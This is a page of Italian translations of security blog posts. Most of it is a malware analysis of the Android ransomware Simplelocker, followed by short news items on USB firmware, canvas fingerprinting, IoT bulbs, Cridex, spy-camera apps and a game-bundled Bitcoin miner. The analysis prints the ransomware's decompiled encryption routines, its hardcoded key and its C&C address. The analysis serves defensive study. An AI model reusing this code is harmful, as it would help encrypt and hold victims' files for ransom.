Come sezionare il ransomware Android Simplelocker

Il post seguente è stato tradotto grazie all’esplicita autorizzazione di Secure Honey

In questo post ci occuperemo di un nuovo tipo di malware per telefoni Android che cifra file importanti e chiede all’utente un riscatto per riottenere l’accesso al telefono.

Questo è il primo caso di ransomware utilizzato sugli smartphone, quindi sono ansioso di saperne di più su questa nuova app dannosa.

Voglio capire cosa faccia questo ransomware e come limiti l’accesso dell’utente ai file della scheda SD. Fornirò una dissezione dettagliata del malware per fornire una spiegazione chiara di come quest’app svolga le sua attività dannose.

Quindi, prima di iniziare l’analisi, diamo un’occhiata, esattamente, a cosa sia Simplelocker e da dove provenga.

Cos’è Simplelocker?

Segnalato per la prima volta da Eset (ESET analizza il primo ransomware TOR-enabled cifra-file per Android) il 4 giugno 2014, Simplelocker ha un unico obiettivo: cifrare alcuni file sulla scheda SD del telefono e poi chiedere denaro per decifrare i dati, noto anche come ransomware.

Il ransomware è un tipo di malware che “limita l’accesso al sistema informatico che infetta e chiede un riscatto che verrà pagato al creatore del malware per rimuovere la restrizione” (vedi Wikipedia: Ransomware).

Abbiamo visto numerosi casi, recentemente, di ransomware infettare computer (come CryptoLocker e Cryptowall) ma questo sembra essere il primo caso di ransomware per smartphone in azione.

Cito i seguenti articoli per la spiegazione del ransomware Simplelocker:

Dissezione del ransomware Simplelocker

MD5: fd694cf5ca1dd4967ad6e8c67241114c
SHA256: 8a918c3aa53ccd89aaa102a235def5dcffa047e75097c1ded2dd2363bae7cf97

APK ottenute da: contagiominidump.blogspot.in/2014/06/simplocker-android-file-encrypting-tor.html

Questo post avrà una forma simile al post precedente Come sezionare il malware per Android Flappy Bird, darò solo per scontato che abbiate già installato i vari strumenti necessari per l’analisi.

Gli strumenti che utilizzerò sono gli stessi dell’analisi precedente:

  • Droidbox, uno strumento d’analisi dinamica che ci mostra cosa stia facendo un’app (ad es.: accessi ai file/siti web, ecc) quando è in esecuzione
  • Android Emulator (incluso nell’Android SDK, utilizzato per eseguire il file APK
  • dex2jar, serie di strumenti che leggono i file Dalvik Executable (.dex/.odex) e generano file .jar
  • JD-GUI, utility grafica che mostra i codici sorgenti Java dei file .jar

Per questa dissezione utilizzerò ancora l’analisi statica e dinamica ma l’approccio sarà leggermente diverso.

A causa della natura pericolosa del ransomware, potrebbe essere rischioso effettuare l’analisi dinamica per prima, nel caso in cui il ransomware danneggiasse il computer. Così effettuerò un’analisi statica di base per determinare ciò che fa l’app e se l’esecuzione in un ambiente virtuale è sicura, prima di effettuare l’analisi dinamica. Tornerò, poi, all’analisi statica dove vedremo il codice in maggiore dettaglio e come svolgerà le attività dannose.

Analisi statica di base

Il primo compito è quello di trasformare il file APK in un file .jar, successivamente potremo aprirlo in JD-GUI per vedere il codice Java che sta alimentando il ransomware.

Passiamo alla console: per prima cosa utilizziamo lo strumento dex2jar per convertire il file APK in un file .jar. Il seguente comando dovrebbe fare al caso nostro:

sh /home/user/dex2jar-version/d2j-dex2jar.sh /home/user/simplocker.apk

Ciò dovrebbe creare un file .jar che è possibile aprire in JD-GUI, producendo qualcosa di simile alla schermata seguente:.

Diamo una breve occhiata a ciò che sta facendo quest’app esplorando alcuni dei file class:

  • Main: chiama MainService
  • MainService: chiama TorService (utilizzato per la connessione alla rete anonima TOR )
  • MainService: chiama FilesEncryptor
  • FilesEncryptor: cifra tutte le immagini e i video, rinomina le loro estensioni in .enc
  • Constants: contiene la variabile EXTENSIONS_TO_ENCRYPT che contiene le seguenti estensioni: “jpeg”, “jpg”, “png”, “bmp”, “gif”, “pdf “,”doc”,”docx”,”txt”,”avi”,”mkv”,”3gp”,”mp4″
  • FilesEncryptor chiama AesCrypt e trova tutte le immagini, video e documenti sulla scheda SD del telefono
  • AesCrypt contiene un metodo chiamato encrypt() che utilizza la crittografia AES e cifra la password “jndlasf074hr” (che si trova in Constants)
  • HTTPSender: si collega a http://xeyocsu7fu2vjhxs.onion/ per inviare dati riguardanti il telefono. Usa 127.0.0.1 porta 9050 come proxy
  • Utils: raccoglie informazioni come IMEI, SO, modello del telefono e produttore

In poche parole queste informazioni ci dicono quanto segue:

  1. Quest’app cerca immagini, documenti e video da cifrare. Dopo aver cifrato i file rinominerà le estensioni in .enc
  2. L’app dispone di un server C&C (command and control) sulla rete TOR
  3. L’app raccoglie informazioni sul telefono (IMEI, SO, modello, costruttore) da inviare al server C&C
  4. Presumibilmente il server C&C può inviare istruzioni per la decifratura all’app

Ora abbiamo un buon quadro generale di come quest’app svolga le sue attività ransomware. Possiamo anche stabilire che sia ragionevolmente sicuro aprire quest’app in un ambiente virtuale su Android Droidbox, quindi passiamo alla fase successiva.

Analisi dinamica

In questa fase vogliamo consentire all’app di funzionare in un ambiente sicuro per confermare, o meno, se i nostri sospetti nella fase di analisi statica di base sono veri.

Il principale strumento che useremo per questa fase è DroidBox (fate riferimento al post precedente, Come sezionare il malware per Android Flappy Bird , per le istruzioni di installazione)

In questa parte lavoreremo con la riga di comando. Inoltre, ricordiamo di esportare il percorso Android SDK in modo da poter lavorare da qualsiasi directory e mantenere ancora l’accesso agli strumenti SDK:

export PATH=$PATH:/path/to/android-sdk/tools/
export PATH=$PATH:/path/to/android-sdk/platform-tools/

Assicuratevi di avere un virtual device setup pronto alla distribuzione nell’Android Virtual Device (AVD) manager inserendo il comando:

android

Passiamo alla directory Droidbox, ora possiamo attivare l’emulatore Android inserendo il seguente comando:

./startemu.sh <AVD name>

Dovrebbe aprirsi il dispositivo virtuale Android con l’SO in caricamento, come si vede nella schermata seguente:

L’emulatore Android potrebbe richiedere uno o due minuti per attivarsi. Una volta pronto, inserire quanto segue nella riga di comando. Questo installerà Simplelocker sul dispositivo virtuale ed eseguirà l’app:

./droidbox.sh simplelocker.apk

Una volta installata l’app, lo schermo virtuale Android dovrebbe essere simile alla schermata seguente:

Questa schermata è la schermata di blocco di Simplelocker presentata all’utente. Il testo, tradotto dal russo, è il seguente:

ATTENZIONE il telefono è bloccato!
Il dispositivo è stato bloccato per aver visualizzato e distribuito pornografia infantile, zoofilia e altre perversioni.
Per sbloccarlo si dovranno pagare 260 UAH.
1. Individuare il payment kiosk più vicino.
2. Selezionare MoneXy
3. Inserire 380982049193
4. Effettuare un deposito di 260 grivna e quindi premere pagare.
Non dimenticare di ritirare la ricevuta!
Dopo il pagamento il vostro dispositivo sarà sbloccato entro 24 ore.
In caso di mancato PAGAMENTO SI PERDERANNO TUTTI I DATI sul dispositivo!

Interessante notare che il codice da inserire (al punto 3) sembra essere lo stesso ad ogni esecuzione dell’app.

Tornando alla linea di comando, DroidBox avrebbe dovuto produrre un output simile alla schermata seguente:

Proseguire e premere Ctrl-C per visualizzare il log JSON dei dati raccolti mentre l’app è in esecuzione.

Questo log mostra l’uso di localhost 127.0.0.1 porta 9051 utilizzato per inviare e ricevere dati, l’app accede anche a molti file.

Questo output non ha dimostrato molto perché non c’è alcuna scheda SD collegata al dispositivo Android virtuale e quindi nessun file da cifrare. Quindi cerchiamo di svolgere l’esperimento di nuovo ma questa volta con alcuni file da cifrare.

Torniamo all’AVD manager inserendo il comando Android sulla riga di comando. Apriamo le impostazioni per AVD utilizzato per l’esperimento e attiviamo la scheda SD di 30 MiB.

Il percorso dell’immagine di questa scheda SD dovrebbe essere ~/.android/avd//sdcard.img, quindi la scheda SD virtuale può essere montata utilizzando il seguente comando

mount ~/.android/avd/sdcard.img -o loop /mnt/sdcard

A questo punto proseguire e copiare sulla scheda SD virtuale montata alcune immagini di esempio (“jpeg”, “jpg”, “png”, “bmp”, “gif”), documenti (“pdf”, “doc”, “docx”, “txt”) e video (“avi”, “mkv”, “3gp”, “mp4″).

Quando alcuni file di esempio sono presenti sulla scheda SD virtuale, smontarla inserendo ciò che segue sulla riga di comando:

umount /mnt/sdcard/

Ora siamo pronti per attivare l’AVD ed eseguire nuovamente l’app in Droidbox:

./startemu.sh <AVD name>
./droidbox.sh simplelocker.apk

AVD potrebbe impiegare un po’ per cifrare tutti i file ma dopo pochi minuti fermare AVD e rimontare la scheda SD virtuale. Tutti i file di esempio dovrebbero essere stati cifrati e le loro estensioni rinominate in .enc.

Quindi a questo punto possiamo confermare che la nostra analisi statica di base si è rivelata corretta: quest’app cifra immagini, documenti e video con estensioni predeterminate.

Analisi Statica: parte seconda

Dopo aver stabilito cosa faccia quest’app, cerchiamo di scoprire come svolga le sue attività dannose esaminando il suo codice più accuratamente.

La funzione principale di quest’app è la cifratura dei file che ha luogo nelle classi FilesEncryptor e AesCrypt. La classe FilesEncryptor contiene un metodo chiamato getFileNames():

private void getFileNames(File paramFile)
  {
    File[] arrayOfFile = paramFile.listFiles();
    int i = 0;
    if (i >= arrayOfFile.length)
      return;
    File localFile = new File(paramFile.getAbsolutePath(), arrayOfFile[i].getName());
    if ((localFile.isDirectory()) && (localFile.listFiles() != null))
      getFileNames(localFile);
    while (true)
    {
      i++;
      break;
      String str1 = localFile.getAbsolutePath();
      String str2 = str1.substring(1 + str1.lastIndexOf("."));
      if (this.extensionsToDecrypt.contains(str2))
      {
        this.filesToDecrypt.add(localFile.getAbsolutePath());
        continue;
      }
      if (!Constants.EXTENSIONS_TO_ENCRYPT.contains(str2))
        continue;
      this.filesToEncrypt.add(localFile.getAbsolutePath());
    }
  }

Questa parte di codice del ransomware si ripete in tutti i file presenti sulla scheda SD. La riga 15 calcola l’estensione di ogni file sulla scheda SD, la 16 controlla che l’estensione del file sia nella lista delle estensioni predeterminate per la cifratura (che si trova nella classe Constants).

La stessa classe contiene anche un metodo chiamato encrypt():

  public void encrypt()
    throws Exception
  {
    AesCrypt localAesCrypt;
    Iterator localIterator;
    if ((!this.settings.getBoolean("FILES_WAS_ENCRYPTED", false)) && (isExternalStorageWritable()))
    {
      localAesCrypt = new AesCrypt("jndlasf074hr");
      localIterator = this.filesToEncrypt.iterator();
    }
    while (true)
    {
      if (!localIterator.hasNext())
      {
        Utils.putBooleanValue(this.settings, "FILES_WAS_ENCRYPTED", true);
        return;
      }
      String str = (String)localIterator.next();
      localAesCrypt.encrypt(str, str + ".enc");
      new File(str).delete();
    }
  }

Questo metodo si ripete in tutti i file aggiunti alla matrice nel metodo precedente (getFileNames()), come si vede nella riga 9. Ogni file è cifrato nella riga 19, grazie a una chiamata al metodo encrypt() della classe AesCrypt.

Il metodo encrypt() della classe AesCrypt richiede due parametri: nome/percorso del file da cifrare e nome/percorso del file di output cifrato. La riga 19 utilizza il nome del file (come stabilito dalla riga 18) e quindi aggiunge l’estensione .enc alla fine del file da scrivere. Infine, la riga 20 elimina il file originale non cifrato.

La classe AesCrypt effettua cifratura e decifratura effettiva dei file. Il suo metodo constructor è riportato di seguito:

  public AesCrypt(String paramString)
    throws Exception
  {
    MessageDigest localMessageDigest = MessageDigest.getInstance("SHA-256");
    localMessageDigest.update(paramString.getBytes("UTF-8"));
    byte[] arrayOfByte = new byte[32];
    System.arraycopy(localMessageDigest.digest(), 0, arrayOfByte, 0, arrayOfByte.length);
    this.cipher = Cipher.getInstance("AES/CBC/PKCS7Padding");
    this.key = new SecretKeySpec(arrayOfByte, "AES");
    this.spec = getIV();
  }

Questo code snipped mostra che il ransomware utilizza la cifratura AES tramite AES/CBC/PKCS7Padding.

La classe AesCrypt contiene un metodo chiamato crypt() (chiamato in precedenza nel metodo encrypt() del FilesEncryptor), questo metodo è il seguente:

  public void encrypt(String paramString1, String paramString2)
    throws Exception
  {
    FileInputStream localFileInputStream = new FileInputStream(paramString1);
    FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
    this.cipher.init(1, this.key, this.spec);
    CipherOutputStream localCipherOutputStream = new CipherOutputStream(localFileOutputStream, this.cipher);
    byte[] arrayOfByte = new byte[8];
    while (true)
    {
      int i = localFileInputStream.read(arrayOfByte);
      if (i == -1)
      {
        localCipherOutputStream.flush();
        localCipherOutputStream.close();
        localFileInputStream.close();
        return;
      }
      localCipherOutputStream.write(arrayOfByte, 0, i);
    }
  }

Qui viene effettuata la cifratura dei file all’interno dell’app. Le righe 4 e 5 creano le variabili utilizzate per l’input e output del file. La riga 6 inizializza la cifratura (per cifrare i dati). Nella riga 7 si compie la cifratura e la riga 19 scrive i byte cifrati nel file di output.

Interessante notare che la stessa classe contiene anche un metodo chiamato decrypt() che è molto simile al metodo encrypt():

  public void decrypt(String paramString1, String paramString2)
    throws Exception
  {
    FileInputStream localFileInputStream = new FileInputStream(paramString1);
    FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
    this.cipher.init(2, this.key, this.spec);
    CipherInputStream localCipherInputStream = new CipherInputStream(localFileInputStream, this.cipher);
    byte[] arrayOfByte = new byte[8];
    while (true)
    {
      int i = localCipherInputStream.read(arrayOfByte);
      if (i == -1)
      {
        localFileOutputStream.flush();
        localFileOutputStream.close();
        localCipherInputStream.close();
        return;
      }
      localFileOutputStream.write(arrayOfByte, 0, i);
    }
  }

Ovviamente questo metodo esegue la decifratura del file di input e produce il file di output decifrato. Gli stessi numeri di riga del metodo encrypt() sono evidenziati per dimostrare come avviene la decifratura.

Conclusione

Come già notato da altri articoli in merito a questo ransomware, questa, al momento, è più che altro un’app proof-of-concept, ancora da scoprire sul Google Play Store. L’app è anche abbastanza semplice per effettuare un reverse-engineer e non presenta nessun offuscamento del codice.

Questa dissezione mostra come l’app cifri i file dell’utente e che le informazioni del telefono vengano inviate a un server C&C sulla rete TOR.

Ma una domanda importante rimane senza risposta: sarebbe possibile decifrare file cifrati dall’app senza connettersi al server C&C? In altre parole: possiamo annullare il danno compiuto da quest’app?

Nel prossimo post vedremo come sarà possibile creare un antidoto per questo ransomware.

Aggiornamento: come promesso, una guida completa su come creare l’antidoto per Simplelocker (che decifra i file) è disponibile nel post Creare un antidoto per il ransomware Android Simplelocker .

Fonte: How To Dissect Android Simplelocker Ransomware


Posted in Secure Honey, Traduzioni inglese-italiano and tagged , by with no comments yet.

La fondamentale insicurezza di USB

Il post seguente è stato tradotto grazie all’esplicita autorizzazione di Schneier on Security

Questa è decisamente notevole:

Molti di noi hanno imparato, da anni, a non attivare file eseguibili da chiavette USB sospette. Ma l’antiquata igiene USB non può fermare quest’infezione dal nuovo sapore: anche se gli utenti sono consapevoli del potenziale degli attacchi, essere certi che il firmware dei loro USB non sia stato manomesso è quasi impossibile. I dispositivi non dispongono di una limitazione nota come “code-signing”, contromisura che assicurerebbe a qualsiasi nuovo codice che venisse aggiunto al dispositivo di avere una firma cifrata non falsificabile del suo produttore. Non c’è nemmeno un firmware USB attendibile per confrontare il codice.

L’elemento della ricerca di Nohl e Lell che l’eleva al di sopra della media minaccia teorica, è l’idea che l’infezione possa viaggiare sia da computer a USB che viceversa. Ogni volta che una chiavetta USB è inserita in un computer, il suo firmware potrebbe essere riprogrammato da malware presente su quel PC, senza che il proprietario del dispositivo USB riesca a rilevarlo. E, allo stesso modo, qualsiasi dispositivo USB potrebbe silenziosamente infettare il computer di un utente.

Questi sono esattamente i tipi di attacchi che l’NSA predilige.

Fonte: The Fundamental Insecurity of USB


Posted in Bruce Schneier, Traduzioni inglese-italiano and tagged by with no comments yet.

Cancellare i cookie? Non c’è modo di sfuggire al canvas fingerprinting

Il post seguente è stato tradotto grazie all’esplicita autorizzazione di Darknet

Il tracciamento sta diventando ancora più complesso: pare che il canvas fingerprinting funzioni in qualsiasi browser che supporti HTML5 e che sia abbastanza difficile da fermare per un utente, essendo una caratteristica di base (un sito web ordina al browser di disegnare un’immagine utilizzando il canvas).

E pare che ogni singolo browser disegni l’immagine in modo leggermente diverso, quindi sarete tracciabili indipendentemente dalle impostazioni di cookie/privacy: basta chiedere al browser di ridisegnare l’immagine e poi, suppongo, analizzare rapidamente un database alla ricerca della corrispondenza dei checksum dell’immagine.

Canvas Fingerprinting

Non sarebbe esattamente legato alla vostra identità (a meno che non l’abbiate già fatto con un sito che richieda/supporti il login) ma collegherebbe l’uso che fate dei siti, in particolare tutti i siti che usano AddThis (che non potrei mai sopportare).

Un nuovo tipo di tracciamento online, estremamente persistente, è spiare i visitatori in migliaia di siti web di alto livello, da WhiteHouse.gov a YouPorn.com.

Il tipo di tracciamento, chiamato canvas fingerprinting, funziona ordinando al browser del visitatore di disegnare un’immagine nascosta ed è stato documentato per la prima volta in un recente paper dei ricercatori delle università di Princeton e KU Leuven, in Belgio. Poiché ogni computer disegna l’immagine in modo leggermente diverso, le immagini possono essere utilizzate per assegnare al dispositivo di ciascun utente un numero che lo identifica in modo univoco.

Come altri strumenti di tracciamento, i canvas fingerprint, vengono usati per costruire profili degli utenti in base ai siti che visitano: profili che delineano quali ad, notizie, o altri tipi di contenuto vengano loro mostrati.
Ma i fingerprint sono particolarmente difficili da bloccare: non possono essere evitati utilizzando le impostazioni di privacy del browser web standard, o utilizzando strumenti anti-tracciamento.

I ricercatori hanno scoperto il codice dei canvas fingerprinting scritto principalmente da una società chiamata AddThis, nel 5% dei primi 100.000 siti web. La maggior parte del codice era sui siti web che utilizzano gli strumenti di condivisione per social media AddThis. Altri fingerprinter includono il marketer digitale tedesco Ligatus e il sito d’incontri canadese Plentyoffish. (Un elenco di tutti i siti in cui i ricercatori hanno trovato il codice è qui).

Parecchi siti usano AddThis, di conseguenza parecchi utenti vengono tracciati: l’articolo/la ricerca afferma il 5% dei primi 100.000 siti web. Quindi almeno 5000 siti ad alto traffico catturano i dati degli utenti in questo modo piuttosto subdolo.
Posso prevedere che parecchia gente rimuoverà AddThis dai propri siti, se questa notizia otterrà seguito.
È possibile trovare un elenco dei siti con il codice fingerprinting qui Siti con gli script del canvas fingerprinting

Rich Harris, amministratore delegato di AddThis, ha detto che la società ha cominciato a testare canvas fingerprinting all’inizio di quest’anno, come possibile alternativa ai “cookie”: tradizionale modo con cui gli utenti vengono tracciati: tramite file di testo installati sui loro computer.

“Stiamo cercando un’alternativa ai cookie”, ha detto Harris in un’intervista.
Harris ha detto che la società ha esaminato le implicazioni sulla privacy del canvas fingerprinting prima di lanciare il test ma ha deciso che “questo è conforme alle regole, regolamenti, leggi e politiche che abbiamo.”

Ha aggiunto che l’azienda ha utilizzato solo i dati raccolti dai canvas fingerprint per la ricerca e sviluppo interni. Ha detto anche che l’azienda non utilizzerà i dati per il targeting degli ad, o la personalizzazione, se gli utenti installeranno il cookie di opt-out AddThis sui loro computer.

Arvind Narayanan, il professore di informatica che ha guidato il team di ricerca di Princeton, ha replicato che costringere gli utenti a prendere alla lettera AddThis in merito a come saranno utilizzati i loro dati, “non è la migliore garanzia di privacy.”

È tutto piuttosto ambiguo ma, onestamente, dobbiamo ritenere che si faccia questo perché una delle cose più preziose che si possa creare da Internet sono i dati dell’utente. Soprattutto i modelli d’uso/consumo, anche se non connessi ad esseri umani specifici, i dati in sè sono molto importanti per chi prende decisioni di marketing basate su di essi.

Inoltre qualunque cosa stia facendo AddThis, non è regolamentata in alcun modo, così possono dire che si fermeranno/cambieranno ma continueranno comunque. Se indossate un cappello di stagnola, probabilmente starete già utilizzando il Browser Tor comunque, quindi buon per voi.

Il paper completo è disponibile anche qui: Il Web non dimentica mai [PDF]

Fonte: Mashable

Fonte: Clear Your Cookies? You Can’t Escape Canvas Fingerprinting


Posted in Darknet, Traduzioni inglese-italiano and tagged , , by with no comments yet.

Violare il vostro frigo: la sicurezza di Internet of Things

Il post seguente è stato tradotto grazie all’esplicita autorizzazione di Darknet

Una delle ultime mode è IoT, o il fenomeno di Internet of things, del quale si parla da un po’(soprattutto da quando è iniziata la discussione dell’IPv6); IoT connette oggetti fisici a Internet e fornisce loro una sorta di IP (tramite NAT o indirizzo IPv6).

Ciò consente di controllare le luci (accensione/spegnimento e attenuazione) tramite telefono, o qualsiasi altra cosa che possa essere collegata (accendere il bollitore, controllare la temperatura del frigo, riscaldare il forno, ecc).

Le possibilità sono praticamente infinite.

Internet of Things Security

Le questioni che IoT suscita sono, ovviamente, una nuova serie di problemi di sicurezza: se tutto è connesso a Internet, è anche incline a essere violato, oggetto di spam, DDoS e generalmente fxttuto.

Immaginate che il vostro allarme sia Internet savvy e qualcuno effettui un DDoS sul quadro di controllo: non potrete più entrare in casa, a meno che non paghiate una sorta di riscatto. E questo accadrà.

Chi è convinto che l’emergente Internet of Things (IOT) diverrà un parco giochi per hacker, tira acqua al proprio mulino con la notizia di venerdì che alcuni ricercatori hanno scoperto una vulnerabilità nelle lampadine Wi-Fi/mesh di rete.

I ricercatori della Context Information Security hanno scoperto che le lampadine a LED del produttore LIFX – progettate per essere controllate da uno smartphone – hanno delle vulnerabilità di sicurezza. Ottenendo l’accesso alla lampadina master, Context è stata in grado di controllare tutte le lampadine collegate e rivelare le configurazioni di rete dell’utente.

Context ha lavorato con LIFX per sviluppare una patch per il bug prima di rilasciare un fix sotto forma di un aggiornamento del firmware. Simon Walker di LIFX ha dichiarato: “Prima della patch, nessun altro tranne Context aveva esposto questa vulnerabilità, molto probabilmente a causa della complessità delle attrezzature e del reverse engineering necessari.”

Per fortuna IoT è una cosa abbastanza nuova, quindi non molti hacker malintenzionati lo stanno esplorando, inoltre, per ora, non c’è nessun reale valore monetario nel violare una lampadina. Piuttosto fastidioso vero? Business critical? No.

Questo, naturalmente, a patto che la lampadina non faccia parte della vostra LAN aziendale e violarla dia accesso alla rete interna…allora diventa una storia completamente diversa.

La scoperta di Context è parte della ricerca in corso nella sicurezza di Internet of Things (IoT), che comprende i parchimetri, frigoriferi connessi a internet e molto altro ancora. Molti di questi componenti, secondo Context, sono stati messi insieme senza pensare alla sicurezza di base.

“È chiaro che nella corsa per montare sul carrozzone dell’IoT, la sicurezza non è una priorità così alta come dovrebbe essere in molti dispositivi connessi”, ha detto Michael Jordan, responsabile della ricerca presso Context. “Abbiamo trovato vulnerabilità anche in altri dispositivi connessi a Internet, dai sistemi di memorizzazione domestica e stampanti, ai monitor e giocattoli per bambini.”

Quindi sì, da quando IoT è diventata più di una ‘cosa’ ed è sempre più adottata, la sicurezza di Internet of Things è importante e potrebbe benissimo diventare il prossimo parco giochi per hacker.

Fortunatamente questo caso è più che altro una condivisione di ricerca/conoscenza piuttosto che qualcosa di rischioso, o un exploit zero-day di un dispositivo IoT. Il prossimo anno, o giù di lì, immagino che incidenti del genere accadranno più spesso.

Fonte: The Register

Fonte: Hacking Your Fridge – Internet of Things Security


Posted in Darknet, Traduzioni inglese-italiano and tagged , by with no comments yet.

Cybertruffatori generano mutanti autoreplicanti che rubano le vostre coordinate bancarie

Il post seguente è stato tradotto grazie all’esplicita autorizzazione di DFI News

Cybercrooks Breed Self-Cloning Mutant That Steals Your Bank Details Cybertruffatori hanno creato un client botnet che incorpora funzionalità simili a un worm, permettendone una rapida diffusione.

Seculert avverte che l’ultima versione del trojan ruba informazioni Cridex (AKA Geodo) include un metodo d’infezione ad autodiffusione.

I PC infetti della botnet scaricano un ceppo secondario di malware – un worm email – dai server command and control. Quel worm invia un’email con i link per scaricare un file ZIP contenente il Trojan Cridex primario.

Seculert ha scoperto che il worm email contiene circa 50.000 credenziali di account SMTP rubati, compresi i relativi server SMTP. Il bot, poi, utilizza queste credenziali per colpire per lo più bersagli tedeschi con l’invio di messaggi email contraffatti, dissimulati come messaggi provenienti da banche e organizzazioni finanziarie tedesche.

Maggiori informazioni.

Fonte: The Register

Fonte: Cybercrooks Breed Self-Cloning Mutant That Steals Your Bank Details


Posted in DFI News, Traduzioni inglese-italiano and tagged by with no comments yet.

Sì, la fotocamera del tuo smartphone può essere usata per spiarti…

Il post seguente è stato tradotto grazie all’esplicita autorizzazione di Naked Security

smartphone-camera-170 Sì, le fotocamere dello smartphone possono essere usate per spiarvi, se non fate attenzione.

Un ricercatore afferma di aver scritto un’app Android che scatta foto e video con una fotocamera dello smartphone anche quando non è attiva: uno strumento piuttosto utile a una spia, o a un inquietante stalker.

Lo studente universitario Szymon Sidor ha affermato in un post sul blog e in un video che la sua app Android utilizza una piccola schermata di anteprima, solo 1 pixel x 1 pixel, che consente alla fotocamera di rimanere in esecuzione in background.

Ora che la maggior parte degli smartphone sono dotati di una fotocamera, (o due) e il loro utilizzo è popolare grazie ad app come Instagram che incoraggiano la condivisione di foto, è un po’ sorprendente che ci sia voluto così tanto affinché gli hacker trovassero modi subdoli per sfruttarle.

Spyware di questo tipo girano da parecchio su Windows: il malware chiamato Blackshades, ad esempio, che gli hacker hanno usato per registrare in segreto le vittime con la webcam del proprio computer.

Ma questo sembra essere il primo caso conclamato di un’applicazione Android che può effettuare un hijack di una fotocamera di uno smartphone, o di un tablet, per lo stesso subdolo scopo.

Secondo Sidor, il sistema operativo Android non consente alla fotocamera di registrare senza effettuare un’anteprima: ecco come Sidor ha scoperto di poter fare un’anteprima così piccola da risultare effettivamente invisibile ad occhio nudo.

Sidor ha dimostrato come funziona l’app in un video, con il suo smartphone Nexus 5.

Il risultato è stato incredibile quanto spaventoso: il pixel è praticamente impossibile da individuare sullo schermo del Nexus 5 (anche se si sa dove guardare)!
Inoltre, anche se si spegne lo schermo, è ancora possibile scattare foto, a patto che il pixel sia ancora lì.

“Permettere alla fotocamera di funzionare in background, senza un indicatore nella barra di notifica, è “imperdonabile” e dovrebbe essere risolto dal team Android di Google”, ha commentato Sidor nel post del suo blog.

Spie Selfie

smartphone-spycam-170 Ci sono altre app spyware per Android facilmente disponibili, come mSpy, che permettono agli spioni di accedere all’attività di un dispositivo, come i messaggi di testo, la localizzazione e persino effettuare registrazioni audio.

Questo è uno dei primi casi, comunque, di un’app che utilizza con successo la fotocamera dello smartphone all’insaputa dell’utente.
Ma soltanto perché questa vulnerabilità Android è qualcosa che i ricercatori hanno scoperto recentemente, non significa che altri non abbiano cercato di sfruttarla per causare danni.

Nel marzo 2014, abbiamo segnalato per Naked Security, un’app spyware per Google Glass che potrebbe fare foto senza che il display del Glass s’illumini.

Mike Lady e Kim Paterson, ricercatori laureati presso Cal Poly in California, hanno caricato su Play Store un’app spyware per Google Glass (mascherata come app per prendere appunti chiamata Malnotes).

Google ha scoperto lo spyware di Glass e l’ha tolto dal Play Store solamente quando il professore della coppia ha twittato in merito al loro esperimento di ricerca.

Forse i ricercatori hanno sbagliato a violare consapevolmente le norme degli sviluppatori di Google per offrire il loro spyware; ma è un segnale di avvertimento che anche l’onnipotente Google non può rendere completamente sicuro Google Play dalle app dannose.

Il consiglio migliore che abbiamo per gli utenti Android si applica anche in questo caso e in molti altri esempi di app dannose:

  • Attenetevi, per quanto possibile, a Google Play.
  • Evitate app che richiedano autorizzazioni di cui non hanno bisogno.
  • Considerate l’utilizzo di un Antivirus Android che analzzi automaticamente le app alla prima esecuzione.

Fonte:Yes, your smartphone camera can be used to spy on you…


Posted in Naked Security, Traduzioni inglese-italiano and tagged , by with no comments yet.

Il Gioco ‘Watch Dogs’ piratato crea una Botnet per il mining di Bitcoin

Il post seguente è stato tradotto grazie all’esplicita autorizzazione di Darknet

Idea decisamente intelligente. Abbiamo scritto di Yahoo! che diffondeva malware per il mining di Bitcoin a gennaio, ma, da allora, non abbiamo più visto attività del genere.

Botnet per il mining di Bitcoin di Watch Dogs

Ma questa, quest’audience, vittima dell’attacco, è decisamente migliore: giocatori con GPU estremamente potenti! Tanto più che questo è uno dei giochi ‘di prossima generazione’ più inflazionati del 2014 (sì, sono in trepidante attesa per la mia PS4). Ma piratare Watch Dogs tramite un torrent del popolare gruppo warez SkidRow, potrebbe rendervi parte di una botnet per il mining di Bitcoin!

Decine di migliaia di giocatori pirati sono stati schiavizzati in una botnet Bitcoin dopo aver scaricato una copia piratata del popolare gioco Watch Dogs. Un torrent del titolo infetto, presumibilmente privato della sua protezione contro la copia, ha avuto quasi 40.000 utenti attivi (seeders e leachers) ed è stato scaricato altre 18.440 volte, il 23 maggio, da un solo sito.

I pirati hanno riferito sui forum di Internet che il pacchetto Torrent, nascosto dal popolare marchio SkidRow, aveva silenziosamente installato un miner Bitcoin insieme a una copia funzionante del gioco.

Il miner Windows girava grazie a due eseguibili installati nella cartella AppData\Roaming\OaPja e avrebbe notevolmente rallentato le macchine con prestazioni inferiori, sottraendo fino a un quarto della potenza della CPU.

ll torrent incriminato, per la maggior parte, è stato rimosso. Un’analisi deve ancora essere compiuta per determinare la posizione, o le identità degli ideatori dell’attacco.

Sembra essere un torrent estremamente popolare, quindi l’infezione potrebbe facilmente raggiungere decine di migliaia di giocatori pirata, che successivamente si trasformerebbe in una botnet per il mining di Bitcoin con decine di migliaia di utenti (un affare piuttosto redditizio, anche con l’attuale difficoltà del mining di Bitcoin).

È anche un po’ ironico che lo slogan del gioco sia “Tutto è connesso”, quindi se si pirata, ognuno è collegato..alla Botnet. E naturalmente il fatto che sia un gioco sull”hacking’, anche se non l’ho ancora giocato e le recensioni delle parti relative all’hacking non siano delle migliori.

I giocatori erano gli obiettivi scelti per i criminali del mining di Bitcoin, perché spesso usano graphical processing units (GPUs) di fascia alta e fuggono piattaforme anti-virus drena-risorse.

“Se vi capita di scaricare giochi contraffatti via Torrent, o altri servizi di condivisione P2P, è probabile che possiate diventare vittima di [un] redditizio trojan in bundle con un autentico GPU miner”, ha detto il chief strategist di BitDefender Catalin Cosoi, in merito a un passato miner Bitcoin che predeva di mira i giocatori.

“Consigliamo d’iniziare a controllare il sistema alla ricerca di segni d’infezione, soprattutto se state costantemente perdendo fotogrammi al secondo.”

Utilizzare disperse risorse di calcolo rubate è stato uno dei pochi modi con i quali gli scommettitori avrebbero potuto ottenere una liquidità decente, macinando i sempre più difficili algoritmi matematici necessari per guadagnare Bitcoin.

I criminali, negli ultimi anni, hanno introdotto con l’inganno miner Bitcoin dal calcolo intensivo per compiere una serie di attacchi orientati sia a GPU di fascia alta che a videoregistratori digitali risibilmente lenti.

